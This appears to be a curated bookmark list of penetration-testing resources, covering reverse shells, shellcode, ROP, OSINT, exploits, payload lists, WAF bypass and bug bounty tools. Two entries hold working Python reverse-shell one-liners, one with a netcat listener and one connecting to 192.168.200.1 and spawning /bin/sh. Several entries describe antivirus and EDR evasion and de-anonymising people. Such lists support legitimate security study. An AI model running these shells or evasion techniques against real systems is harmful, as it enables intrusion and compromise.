CSIRT / Pentesting / ShellCodes / Reverse Shell: | |||
| I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch) | : nc -lnvp 1234 / python3 -c "# 107, single statement, non-blocking ("subprocess").Popen("sh",0,None,*[ ("socket").create_connection(("127.0.0.1",1234))] [ socket.create_connection(("127.0.0.1",1234))]*3)" | ||
| python-pty-shells | 740 | over 10 years ago | : Python PTY backdoors - full PTY or nothing! |
| Powershell HTTP/S Reverse Shell | 595 | 3 months ago | : Powershell reverse shell using HTTP/S protocol with AMSI bypass and Proxy Aware |
| HTTP/S Asynchronous Reverse Shell | 264 | about 3 years ago | : (POC) Asynchronous reverse shell using the HTTP protocol |
| powershell reverse shell one-liner | by Nikhil SamratAshok Mittal @samratashok | ||
| Reverse Shell Cheat Sheet | |||
| Reverse Shell Generator | |||
| How to Execute Shell Commands with Python | |||
| Reverse Shell to fully interactive | |||
| Single-Line Web Shell | |||
| Simple-Backdoor-One-Liner.php | |||
| reverse shell | |||
| Spawning reverse shells | |||
| Spawning interactive reverse shells with TTY | |||
| Reverse Shell Cheat Sheet | |||
| shellver | 289 | over 4 years ago | : Reverse Shell Cheat Sheet TooL |
| GTRS | 616 | about 1 month ago | : GTRS - Google Translator Reverse Shell |
| Using tmux for automating interactive reverse shells | |||
CSIRT / Pentesting / ShellCodes | |||
| USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV | |||
| New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars! | |||
| Usando a pwntools para Binary Exploitation | (pt-br) | ||
| CallObfuscator | 981 | almost 4 years ago | : Obfuscate specific windows apis with different apis |
| vba-obfuscator | 150 | about 3 years ago | : 2018 School project - PoC of malware code obfuscation in Word macros |
| ProcessInjection | 1,080 | about 1 year ago | : This program is designed to demonstrate various process injection techniques |
| Ten process injection techniques: A technical survey of common and trending process injection techniques | |||
| shellcoding using env variables | |||
| From a C project, through assembly, to shellcode | |||
| Writing and Compiling Shellcode in C | |||
| Using ICMP to deliver shellcode | |||
| Buffer Overflow Windows - EGGHUNTER cheatsheet | |||
| metasploit, x86/alpha_mixed and Windows 7 are killing me | |||
| Some lessons learned along the way to Buffer Overflow | |||
| Windows 10 Exploit Development Setup - Vulnserver Walkthrough Part 1 | |||
| Resolving API addresses in memory | |||
| Locating Kernel32 Base Address | |||
| Finding Kernel32 Base and Function Addresses in Shellcode | |||
| Basics of Windows shellcode writing | |||
| Shellcodes database for study cases | |||
| Return Oriented Programming (ROP) Attacks | |||
CSIRT / Pentesting / ShellCodes / Gadgets: | |||
| ROPgadget Tool | 3,944 | about 2 months ago | |
| RETURN ORIENTED PROGRAMMING (ROP) | |||
| ROP Gadget Prevalence and Survival under Compiler-based Binary Diversification Schemes | |||
| one_gadget | 2,070 | 20 days ago | : The best tool for finding one gadget RCE in libc.so.6 |
| JOP ROCKET | 100 | 3 months ago | : The Jump-oriented Programming Reversing Open Cyber Knowledge Expert Tool, or JOP ROCKET, is a tool designed to help facilitate JOP gadget discovery in an x86 Windows environment |
CSIRT / Pentesting / ShellCodes | |||
| A fun trick for running shellcode directly from bash | |||
| Polyglot Assembly | : Writing assembly code that runs on multiple architectures | ||
| Shellcode Injection Techniques | 447 | about 3 years ago | : A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload. I will be building this project up as I learn, discover or develop more techniques. Some techniques are better than others at bypassing AV |
| Simple Shellcode Tale! | |||
| Linux x86 execve("/bin/sh") - 28 bytes | |||
| ShellCode Tester | 90 | 17 days ago | : An application to test windows and linux shellcodes |
| Windows/x86 Dynamic Bind Shell / Null-Free Shellcode | |||
| Core | 43 | about 3 years ago | : Core bypass Windows Defender and execute any binary converted to shellcode |
| Encontrando endereço da função dinamicamente. Análise da biblioteca block_api | (pt-br) | ||
| Ninja UUID Shellcode Runner | 433 | over 1 year ago | : Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10! |
| IPFuscator | 352 | 10 months ago | : A tool to automatically generate alternative IP representations |
| Shellcode Mutator | 233 | almost 2 years ago | : Mutate nasm assembly source files using no-instruction sets (such as nops) to avoid signatures |
CSIRT / Pentesting / Reporting | |||
| public-pentesting-reports | 8,498 | 6 months ago | . Curated list of public penetration test reports released by several consulting firms and academic security groups |
| report-ng | 66 | 10 months ago | : Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base |
| PandocPentestReport | 10 | about 5 years ago | : This repository shows my effort to create a pandoc based pentest report template |
| Technical Report template | 2 | over 9 years ago | : LaTeX template for technical reports |
| TryHackMe. Breaking Into the Kenobi Machine. | |||
| PwnDoc | : is a pentest reporting application making it simple and easy to write your findings and generate a customizable Docx report | ||
| This is how you can deliver true value through your pentest reports | |||
| Offensive Security Exam Report Template in Markdown | 3,558 | 21 days ago | : Markdown Templates for Offensive Security OSCP, OSWE, OSCE, OSEE, OSWP exam report |
| A List of Post-mortems! | 11,316 | 4 months ago | : A collection of postmortems. Sorry for the delay in merging PRs! |
CSIRT / Pentesting / OSINT - Open Source INTelligence | |||
| Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19. | 61 | almost 7 years ago | |
| OSINT tool for visualizing relationships between domains, IPs and email addresses. | |||
| sn0int | 2,058 | about 2 months ago | : Semi-automatic OSINT framework and package manager |
| OSINT – Passive Recon and Discovery of Assets | A Pentester’s Guide – Part 1: | ||
| OSINT – LinkedIn is Not Just for Jobs | A Pentester’s Guide - Part 2: | ||
| iKy | : I Know You (OSINT project) | ||
| Gitrob | 5,938 | about 2 years ago | : Putting the Open Source in OSINT |
| OSint Tools | : On this page you’ll find tools which you can help do your OSINT reseach | ||
| datasploit | 3,032 | over 4 years ago | : An #OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats |
| the-endorser | 327 | over 3 years ago | : An OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills |
| OSINT-y Goodness | : HathiTrust Digital Library | ||
| OSINT Resources for 2019 | |||
| Awesome OSINT | 19,100 | 12 days ago | : 😱 A curated list of amazingly awesome OSINT |
| Directory of Open Access Journals | OSINT-y Goodness, №14 - | ||
| Identifying A Pro-Indonesian Propaganda Bot Network | Twitter Analysis: | ||
| TWINT | 15,833 | over 1 year ago | : An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API, allowing you to scrape a user's followers, following, Tweets and more while evading most API limitations |
| Breaking Mimblewimble’s Privacy Model | : Mimblewimble’s privacy is fundamentally flawed. Using only $60/week of AWS spend, I was able to uncover the exact addresses of senders and recipients for 96% Grin transactions in real time | ||
| snscrape | 4,490 | about 1 year ago | : A social networking service scraper in Python |
| ꓘamerka GUI | Hack the planet with — Ultimate Internet of Things/Industrial Control Systems reconnaissance tool. , . ICS/IoT search: | ||
| dmi-tcat | 367 | 16 days ago | /Digital Methods Initiative - Twitter Capture and Analysis Toolset |
| KnockKnock | 181 | over 1 year ago | : A simple reverse whois lookup CLI which allows you to find domain names owned by an individual person or company, often used for Open Source Intelligence (OSINT) purposes |
| From email to phone number, a new OSINT approach | |||
| recox | 318 | 6 months ago | : Master script for web reconnaissance |
| openSquat | 729 | 4 months ago | is an opensource Intelligence (OSINT) R&D project to identify cyber squatting threats to specific companies or domains, such as domain squatting, typo squatting, IDN homograph attacks, phishing and scams |
| Trace Labs Kali Linux build configuration | 680 | over 1 year ago | : |
| natlas | 626 | 4 months ago | : Scaling Network Scanning. Changes prior to 1.0 may cause difficult to avoid backwards incompatibilities. You've been warned |
| sifter | : is a osint, recon & vulnerability scanner. It combines a plethara of tools within different module sets in order to quickly perform recon tasks, check network firewalling, enumerate remote and local hosts, and scan for the 'blue' vulnerabilities within microsft and if unpatched, exploit them | ||
| Kitsune | 242 | over 2 years ago | : An artificial neural network to detect automated Twitter accounts (bots) |
| Image "Cloaking" for Personal Privacy | |||
| OSINT-Brazuca | 1,636 | about 2 months ago | (pt-br) : Repositório criado com intuito de reunir informações, fontes(websites/portais) e tricks de OSINT dentro do contexto Brasil |
| WhatsMyName | : This tool allows you to enumerate usernames across many websites | ||
CSIRT / Pentesting / OSINT - Open Source INTelligence / WhatsMyName | |||
| Maltego Transforms for WhatsMyName | 63 | over 1 year ago | |
CSIRT / Pentesting / OSINT - Open Source INTelligence | |||
| shadowbanned | : Shadowban Tester for Twitter | ||
| sherlock | 60,468 | 9 days ago | : Hunt down social media accounts by username across social networks |
| usufy | 7 | almost 10 years ago | is a GPLv3+ piece of software that checks the existence of a profile for a given user in a bunch of different platforms. It uses the error messages displayed by most platforms when a user profile has not been found as the evidence of the existence or not of a given profile |
| osrf | 928 | 7 months ago | : OSRFramework, the Open Sources Research Framework is a AGPLv3+ project by i3visio focused on providing API and tools to perform more accurate online researches |
| IntelMQ | : A tool-suite solution for IT security teams (CERTs & CSIRTs, SOCs abuse departments, etc.) for collecting and processing security feeds using a message queuing protocol. Its main goal is to give to incident responders an easy way to collect & process threat intelligence thus improving the incident handling processes of CERTs | ||
| OSINT SAN Framework. | (ru) : OSINT-SAN Framework makes it possible to quickly find information and de-anonymize Internet users. The software is a framework that contains 30 functions for searching information or de-anonymizing users. With the help of my software, you can collect information about users on the Internet, anonymously and without special skills | ||
| Scrummage | 512 | about 1 year ago | : The Ultimate OSINT and Threat Hunting Framework |
| viper | 3,745 | about 2 months ago | : Intranet pentesting tool with webui 开源图形化内网渗透工具 |
| ⡷⠂𝚔𝚊𝚛𝚖𝚊 𝚟𝟸⠐⢾ | 815 | 5 months ago | is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework) |
| 3WiFi | : Free Wireless Database | ||
| Stealth plane in flight | |||
| ExportData | Twitter data export tool. Allows downloading historical tweets since 2006, exporting followers & followings and collects historical trends in 467 locations | ||
| DetectDee | 1,289 | about 1 year ago | : Hunt down social media accounts by username, email or phone across social networks |
| OSINT framework | focused on gathering information from free tools or resources | ||
| h8mail | 4,187 | over 1 year ago | : Password Breach Hunting & Email OSINT tool, locally or using premium services. Supports chasing down related email |
| PwnBin | 427 | about 3 years ago | : Python Pastebin Webcrawler that returns list of public pastebins containing keywords |
| ODBParser | : OSINT tool to search, parse and dump only the open Elasticsearch and MongoDB directories | ||
| pastego | 97 | almost 3 years ago | : Scrape/Parse Pastebin using GO and expression grammar (PEG) |
| Instagram Scraper | : Scrapes an instagram user's photos and videos | ||
| galer | 253 | 11 days ago | : A fast tool to fetch URLs from HTML attributes by crawl-in |
| How to bypass CloudFlare bot protection ? | |||
| SpyScrap | 169 | 12 months ago | : CLI and GUI for OSINT. Are you very exhibited on the Internet? Check it! Twitter, Tinder, Facebook, Google, Yandex, BOE. It uses facial recognition to provide more accurate results.F |
| pwnedOrNot | 2,239 | about 1 year ago | OSINT Tool for Finding Passwords of Compromised Email Addresses |
| dorking | (how to find anything on the Internet) | ||
| Complete Google Dorks List in 2020 For Ethical Hacking and Penetration Testing | |||
| The closer a username/email address resembles other username/email addresses associated w/ a target, the easier it is to find (or guess &/or 'bruteforce') other usernames/email addresses associated w/ that target. | |||
| DorkGenius | : Generate custom dorks for Google, Bing, DuckDuckGo, & more! | ||
| chatter | 146 | over 1 year ago | : internet monitoring osint telegram bot for windows |
| Slackhound | 74 | 9 months ago | : Slackhound allows red and blue teams to perform fast reconnaissance on Slack workspaces/organizations to quickly search user profiles, locations, files, and other objects |
| ail-feeder-telegram | 13 | 10 days ago | : External telegram feeder for AIL framework |
| MODIFYING TELEGRAM'S "PEOPLE NEARBY" FEATURE TO PINPOINT PEOPLE'S HOMES | |||
| signald | : unofficial daemon for interacting with Signal | ||
| Telegram messenger CLI | 386 | over 2 years ago | : for Telegram IM |
| TelegramScraper | 42 | about 4 years ago | : Telegram scraping tool for researching mis-/disinformation and investigating shade goings on |
| OSINT-Discord-resources | 347 | 8 months ago | : Some OSINT Discord resources |
CSIRT / Pentesting / Vulnerability | |||
| Striker | 2,234 | over 1 year ago | is an offensive information and vulnerability scanner |
| SQL Vulnerability Scanner | 975 | almost 7 years ago | |
| Decentralized Application Security Project | , | ||
| Introduction to IDAPython for Vulnerability Hunting — Somerset Recon | |||
| Beating the OWASP Benchmark | |||
| CMSScan | 964 | over 3 years ago | : Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues |
| Meteor Blind NoSQL Injection | |||
| Security Bulletins that relate to Netflix Open Source | 742 | about 2 months ago | |
| tsunami-security-scanner | 8,274 | 2 months ago | : Tsunami is a general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence |
| Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners | , | ||
| New NAT/Firewall Bypass Attack Lets Hackers Access Any TCP/UDP Service | . allows an attacker to remotely access any TCP/UDP services bound to a victim machine, bypassing the victim’s NAT/firewall, just by the victim visiting a website. . video: | ||
| openVulnQuery | 29 | over 1 year ago | : A Python-based client for the Cisco openVuln API |
| HellRaiser | 562 | over 1 year ago | : Vulnerability Scanner |
| Open-Source Vulnerability Intelligence Center | : - Vulnerability Intelligence Center / Exploits | ||
| Vagrant GVM/Openvas | 4 | over 3 years ago | : GVM/Openvas vulnerability scanner in Alpine with Vagrant |
| How to Have a Cybersecurity Graph Database on Your PC | |||
| On the Security Vulnerabilities of Text-to-SQL Models | |||
CSIRT / Pentesting / WAFs | |||
| Web Application Penetration Testing Course URLs | |||
| Web Application Penetration Testing Notes | |||
| quarantyne | 119 | over 2 years ago | : Modern Web Firewall: stop account takeovers, weak passwords, cloud IPs, DoS attacks, disposable emails |
| Sitadel | 554 | 12 months ago | : Web Application Security Scanner |
| WAF through the eyes of hackers | |||
| Some nice payloads to bypass XSS WAF | : | ||
| Some MySQL tricks to break some #WAFs out there. | |||
| another one | : | ||
| bypassing moderning web application firewalls | |||
| WAFW00F | 5,296 | about 2 months ago | allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website |
| Bypassing Cloudflare WAF with the origin server IP address | |||
| WAF-Hook | 5 | 8 months ago | |
CSIRT / Pentesting / WAFs / How to find real IP of a site behind cloudflare | |||
| Cloudfail tool | |||
| Shadowcrypt Cloudflare resolve | |||
| Behindflare tool | 15 | almost 2 years ago | |
| Wordpress technique | |||
CSIRT / Pentesting / WAFs | |||
| A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection | |||
CSIRT / Pentesting / Exploits | |||
| IOSurface exploit | 218 | 5 months ago | |
| Attacking a co-hosted VM: A hacker, a hammer and two memory modules | |||
| How To Create a Metasploit Module | |||
| Installing Metasploit Pro, Ultimate, Express, and Community | |||
| unfurl | 60 | almost 7 years ago | , |
| A collection of vulnerable ARM binaries for practicing exploit development | 898 | about 3 years ago | |
| A collection of PHP exploit scripts | 838 | 9 months ago | |
| Sage ACF Blocks | 37 | 6 months ago | : A Sage 10 helper package for building ACF blocks rendered using blade templates |
| WebKit exploit | 749 | over 3 years ago | |
| Modern Binary Exploitation - Spring 2015 | |||
| Python 2 vs 3 for Binary Exploitation Scripts | (video) | ||
| DriveCrypt | : DriveCrypt Dcr.sys vulnerability exploit | ||
| Faxploit | : Sending Fax Back to the Dark Ages | ||
| beebug | 210 | over 5 years ago | : A tool for checking exploitability |
| NAVEX | : Precise and scalable exploit generation for dynamic web applications | ||
| Three New DDE Obfuscation Methods | |||
| SILENTTRINITY | 2,196 | 12 months ago | : A post-exploitation agent powered by Python, IronPython, C#/.NET |
| fuxploider | 3,050 | over 1 year ago | : File upload vulnerability scanner and exploitation tool |
| Jailbreaks Demystified | – GeoSn0w – Programmer. Hacking stuff | ||
| Attacking Google Authenticator | |||
| Pacu | 4,400 | 8 days ago | : The AWS exploitation framework, designed for testing the security of Amazon Web Services environments. , |
CSIRT / Pentesting / Exploits / Glibc Heap Exploitation Basics: | |||
| Introduction to ptmalloc2 internals (Part 1) | |||
| ptmalloc2 internals (Part 2) | Fast Bins and First Fit Redirection | ||
CSIRT / Pentesting / Exploits | |||
| movfuscator | 9,503 | 6 months ago | : The single instruction C compiler |
| beebug | 210 | over 5 years ago | : A tool for checking exploitability |
| UEFI vulnerabilities classification focused on BIOS implant delivery | and | ||
| MikroTik Firewall & NAT Bypass | |||
| 3D Accelerated Exploitation | 54 | almost 6 years ago | : The content of this repository is meant to be the official release of the tooling/exploit that was discussed during the OffensiveCon 2019 talk - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium |
| GhostDelivery | : Python script to generate obfuscated .vbs script that delivers payload (payload dropper) with persistence and windows antivirus disabling functions | ||
| Beat the hole in the ATM | : hacking an diebold ATM | ||
| RedGhost | 536 | over 3 years ago | : Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace |
| PowerSploit | 11,936 | over 4 years ago | : is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment |
| Z-Shave. Exploiting Z-Wave downgrade attacks | |||
| Totally Pwning the Tapplock Smart Lock | Andrew Tierney 13 Jun 2018 | ||
| I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃 | : python -c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');" | ||
| The Art of WebKit Exploitation | |||
| PEASS | 16,117 | 21 days ago | : Privilege Escalation Awesome Scripts SUITE |
| Patchless AMSI bypass using SharpBlock | |||
CSIRT / Pentesting / Exploits / Patchless AMSI bypass using SharpBlock | |||
| Lets Create An EDR… And Bypass It! Part 1 | |||
| Lets Create An EDR… And Bypass It! Part 2 | |||
| SharpBlock | 1,114 | over 3 years ago | : A method of bypassing EDR's active projection DLL's by preventing entry point exection. : Simple EDR implementation to demonstrate bypass |
CSIRT / Pentesting / Exploits | |||
| Bypassing Antivirus with Golang – Gopher it! | |||
| The Invoke-CradleCrafter Overview | |||
| DVS | 197 | about 4 years ago | : D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife - Lateral movement using DCOM Objects |
| The Exploit Database Git Repository | 7,738 | about 2 years ago | |
| Vulnerability Lab | : helps with the world's first independent bug bounty hacker community. Leverage their skills and creativity to surface your critical vulnerabilities before criminals can exploit them | ||
| 0day.Today | : Biggest Exploits Database and 0day market - The Underground, is one of the world's most popular and comprehensive computer security web sites | ||
| cxsecurity | : is an open project developed and moderated fully by one independent person | ||
| Security Focus | |||
| Exploit Files | packet storm: | ||
| Graphology of an Exploit | : Hunting for exploits by looking for the author’s fingerprints | ||
| Traditional Buffer Overflow Windows cheatsheet | |||
| Exploit writing tutorial part 3 : SEH Based Exploits | |||
| Vulnerability DB | : Detailed information and remediation guidance for known vulnerabilities | ||
| mssqlproxy | 724 | almost 4 years ago | is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse |
| Script to decode .vbe files | |||
| A First Introduction to System Exploitation | |||
| AllPocsFromHackerOne | 874 | almost 2 years ago | : This script grabs public report from hacker one and download all JSON files to be grepable |
| How I Found My First Ever ZeroDay (In RDP) | |||
| Part 1 | Learning Linux Kernel Exploitation: , | ||
| SharpSelfDelete | 147 | about 3 years ago | : C# implementation of the research by @jonaslyk and the drafted PoC from @LloydLabs |
| preeny | 1,574 | 7 months ago | : Some helpful preload libraries for pwning stuff |
| Exploits, Vulnerabilities and Payloads: Practical Introduction | |||
| Beginners Guide to 0day/CVE AppSec Research | |||
| 0days In-The-Wild | Hello! This site aims to be a central repository for information about 0-days exploited in-the-wild! It's maintained by Google Project Zero | ||
| Sticky notes for pentesting. | |||
CSIRT / Pentesting / Payloads | |||
| Payloads Collection | by @alra3ees: | ||
CSIRT / Pentesting / Payloads / Payloads Collection | |||
| Command Injection Payload List | 3,006 | 4 months ago | |
| Cross Site Scripting (XSS) Vulnerability Payload List | 6,366 | 4 months ago | |
| XML External Entity (XXE) Injection Payload List | 1,097 | 4 months ago | : XML External Entity (XXE) Injection Payload List |
| SQL Injection Payload List | 5,000 | 4 months ago | : SQL Injection Payload List |
| RFI/LFI Payload List | 538 | 4 months ago | |
| Open Redirect Payload List | 533 | 4 months ago | |
CSIRT / Pentesting / Payloads / MSFVenom: | |||
| Criando Payloads de Shell Reverso com MSFVenom | (pt-br) | ||
| MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) | |||
| MSFVenom - CheatSheet | |||
| Hiding Metasploit Shellcode to Evade Windows Defender | |||
| Creating Metasploit Payloads | |||
| Shikata Ga Nai Encoder Still Going Strong | |||
| BYPASSING ANTIVIRUS WITH MSFVENOM | |||
| MSFVenom Cheatsheet | |||
CSIRT / Pentesting / Payloads | |||
| Payload Delivery for DevOps | : Building a Cross-Platform Dropper Using the Genesis Framework, Metasploit and Docker | ||
| LaTex Injection | 61,485 | 4 days ago | |
| Hiding malicious code with “Module Stomping”: Part 1 | |||
| Phantom-Evasion | 1,392 | about 1 year ago | : Python antivirus evasion tool |
| Steganography | 572 | about 1 month ago | : Least Significant Bit Steganography for bitmap images (.bmp and .png), WAV sound files, and byte sequences. Simple LSB Steganalysis (LSB extraction) for bitmap images |
| PyFuscation | 510 | almost 2 years ago | : Obfuscate powershell scripts by replacing Function names, Variables and Parameters |
| Starting a handler with Metasploit | |||
| Reverse Shell Cheat Sheet | |||
| System Calls | 107 | about 3 years ago | : An example of using Syscalls in C# to get a meterpreter shell |
| Awesome one-liner bug bounty | |||
| bbrecon | 219 | over 3 years ago | Python library and CLI for the Bug Bounty Recon API |
| RPC Bug Hunting Case Studies – Part 1 | |||
| Top Penetration Testing & Bug Hunting YouTube Channels you should follow | Updated 11/19/2020 | ||
| Our top tips for better bug bounty reports, plus a hacker contest! | |||
| axiom | 4,058 | about 2 months ago | : The dynamic infrastructure framework for anybody! |
| KindleDrip | : From Your Kindle’s Email Address to Using Your Credit Card | ||
| Amazon Kindle Vulnerabilities Could Have Led Threat Actors to Device Control and Information Theft | |||
| How I Might Have Hacked Any Microsoft Account | |||
| BugBountyScanner | 874 | 11 months ago | : A Bash script and Docker image for Bug Bounty reconnaissance. Intended for headless use |
| alert() is dead, long live print() | |||
| Bug Bounty Reconnaissance Framework | 295 | 5 days ago | The (BBRF) can help you coordinate your reconnaissance workflows across multiple devices |
| If you do use BBRF, here it is a initial script to use HackerOne API to gather all programs' scope, including your private programs. | |||
| KeyHacks | 5,099 | 3 months ago | is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid |
| NotKeyHacks | is the opposite of the KeyHacks repository by @streaak. Sensitive tokens are fun, but a lot of time is wasted reading documentation only to figure out that the token you found named AppSecret is, somehow, not sensitive at all and meant to be public. This repository is meant to be an inventory of those tokens that look potentially sensitive but aren't so that we can just CTRL-F and save a lot of time | ||
| Two Rights Might Make A Wrong | |||
| You always hear stories about how bug bounty programs steal your bug, but very few people post about it, or have the 100% proof to show this. | |||
| OOB reads in network message handlers leads to RCE | |||
| Bug Bounty Resources | |||
| Google Bug Hunters | Welcome to Google's Bug Hunting community | ||
| 0-Day Hunting (Chaining Bugs/Methodology) | |||
| KingOfBugBounty Project | 4,234 | 4 months ago | : Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters |
| awesome-web-hacking | 5,875 | 1 day ago | : A list of web application security |
| gau | 4,000 | 25 days ago | : Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl |
| malvun | is the first website exclusively dedicated to the research of security vulnerabilities within Malware itself | ||
| Introducing CookieMonster | : a tool for breaking stateless authentication | ||
| get-title | 2,148 | about 1 year ago | |
| Insecure Direct Object References | 61,485 | 4 days ago | |
| bugbounty-cheatsheet | 5,938 | about 1 year ago | : A list of interesting payloads, tips and tricks for bug bounty hunters |
| Awesome Bug Bounty | 4,668 | 10 months ago | : A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups |
| ParamSpider | 2,527 | 5 months ago | : Mining parameters from dark corners of Web Archives |
| Server Side Request Forgery | 61,485 | 4 days ago | |
| CRLF | 5,938 | about 1 year ago | |
| CRLF Injection | 61,485 | 4 days ago | |
| crlf-injector | 46 | over 2 years ago | : A CRLF ( Carriage Return Line Feed ) Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL |
| CRLF Bruter | 10 | over 3 years ago | : A simple tool to test for CRLF injection |
| CSV-Injection | 5,938 | about 1 year ago | |
| CSV Injection | 61,485 | 4 days ago | |
| Command Injection | 61,485 | 4 days ago | |
| Directory Traversal | 61,485 | 4 days ago | |
| $4,000 Starbucks secondary context path traversal | |||
| LFI | 5,938 | about 1 year ago | |
| kadimus | 514 | over 4 years ago | : kadimus is a tool to check and exploit lfi vulnerability |
| fimap | : is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps | ||
| File Inclusion | 61,485 | 4 days ago | |
| Open-Redirect | 5,938 | about 1 year ago | |
| RCE | 5,938 | about 1 year ago | |
| Crypto | 5,938 | about 1 year ago | |
| Template Injection | 5,938 | about 1 year ago | |
| SSTI | 61,485 | 4 days ago | |
| XSLT | 5,938 | about 1 year ago | |
| Content Injection | 5,938 | about 1 year ago | |
| LDAP Injection | 61,485 | 4 days ago | |
| NoSQL Injection | 61,485 | 4 days ago | |
| IDOR | 61,485 | 4 days ago | |
| ISCM | 61,485 | 4 days ago | |
| OAuth | 61,485 | 4 days ago | |
| XPATH Injection | 61,485 | 4 days ago | |
| Bypass Upload Tricky | 61,485 | 4 days ago | |
| Web Security CheatSheet | |||
| Presenting The Pwning-Machine, a versatile and easy to setup Bug bounty environment. | |||
| Zeus-Scanner | 959 | about 1 year ago | : is an advanced reconnaissance utility designed to make web application reconnaissance simple. Zeus comes complete with a powerful built-in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and is able to bypass search engine captchas |
CSIRT / Pentesting / Payloads / SQL Injection: | |||
| SQL injection | |||
| SQL Injection | |||
| Blind SQL injection | |||
| Dangerous Injections | |||
| Blind SQL Injection at fasteditor.hema.com | |||
| SQL Injection 101: How to Fingerprint Databases & Perform General Reconnaissance for a More Successful Attack | |||
| SQL injection cheat sheet | |||
| SQL Injection Cheat Sheet | |||
| The Ultimate SQL Injection Cheat Sheet | |||
| Examining the database in SQL injection attacks | |||
| Dumping a complete database using SQL injection | |||
| SQLi | 5,938 | about 1 year ago | |
| SleuthQL | : A SQL Injection Discovery Tool | ||
| Postgres SQL Injection Cheat Sheet | |||
| From SQL Injection to Shell: PostgreSQL edition | |||
| Pentesting PostgreSQL with SQL Injections | |||
| SQLite Injection | 61,485 | 4 days ago | |
| Blind SQL Injection Detection and Exploitation (Cheat Sheet) | |||
| 1 | SQLMap Cheat Sheet: , , , , | ||
| SQL injection | : Improper handling of input during SQL query generation | ||
| An investigation into SQL Injection tools — The pattern of each attack tool Part II | |||
| Advanced SQL Injection | |||
CSIRT / Pentesting / Payloads / CSRF: | |||
| DNS Hijacking Attacks on Home Routers in Brazil | |||
| CSRF Injection | 61,485 | 4 days ago | |
| Bypassing CSRF tokens with Python’s CGIHTTPServer to exploit SQL injections | |||
CSIRT / Pentesting / Payloads / HTTP Request Smuggling: | |||
| HRS - 𝐇𝐓𝐓𝐏 𝐑𝐞𝐪𝐮𝐞𝐬𝐭 𝐒𝐦𝐮𝐠𝐠𝐥𝐢𝐧𝐠 Attack. What, Why and How. | |||
| Practical Attacks Using HTTP Request Smuggling | |||
| HAProxy HTTP request smuggling | (CVE-2019-18277) | ||
| The Powerful HTTP Request Smuggling | |||
| Smuggler | 13 | about 2 years ago | : An HTTP Request Smuggling / Desync testing tool written in Python 3 |
| HTTP.Request.Smuggling.Desync.Attack | 14 | over 3 years ago | : HTTP request smuggling is a technique for interfering with the way of website process the sequences of HTTP requests that are received from one or more users |
| h2c Smuggling | : Request Smuggling Via HTTP/2 Cleartext (h2c) | ||
| HTTP Request Smuggler | 958 | 11 months ago | : This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks, originally created during HTTP Desync Attacks research |
| Advanced request smuggling | |||
CSIRT / Pentesting / Payloads / XSS: | |||
| Cross-site scripting (XSS) cheat sheet | |||
| Reflected XSS on www.hackerone.com via Wistia embed code | |||
| xss cheatsheet | 5,938 | about 1 year ago | |
| Cross Site Scripting ( XSS ) Vulnerability Payload List | 6,366 | 4 months ago | |
| an XSS payload, Cuneiform-alphabet based | |||
CSIRT / Pentesting / Payloads | |||
| Security impact of a misconfigured CORS implementation | |||
| Which Security Risks Do CORS Imply? | |||
| Cross-Origin Resource Sharing (CORS) | |||
| How to win at CORS | |||
| CORS'ing a Denial of Service via cache poisoning | |||
| SSRF Search & Destroy | : | ||
| SSRF | 5,938 | about 1 year ago | |
| SSRF Tips | : some tips with Server Side Request Forgery | ||
| Server Side Request Forgery on MISP | : CVE-2020-28043 | ||
| SSRF (Server Side Request Forgery) worth $4,913 | My Highest Bounty Ever ! | |||
| Unauthenticated Full-Read SSRF in Grafana | : CVE-2020-13379 | ||
| Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata | |||
| Gf-Patterns | 1,218 | 2 months ago | : GF Paterns For (ssrf,RCE,Lfi,sqli,ssti,idor,url redirection,debug_logic, interesting Subs) parameters grep |
| Blind SSRF Chains | by | ||
| lorsrf | 289 | 2 months ago | : Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods |
| Out of Band XXE in an E-commerce IOS app | by | ||
| Comprehensive Guide on XXE Injection | |||
| XMLDecoder payload generator | 149 | almost 4 years ago | : A simple python script to generate XML payloads works for XMLDecoder based on ProcessBuilder and Runtime exec |
| Enjoying my first blind xxe experience | |||
| XXE | 5,938 | about 1 year ago | |
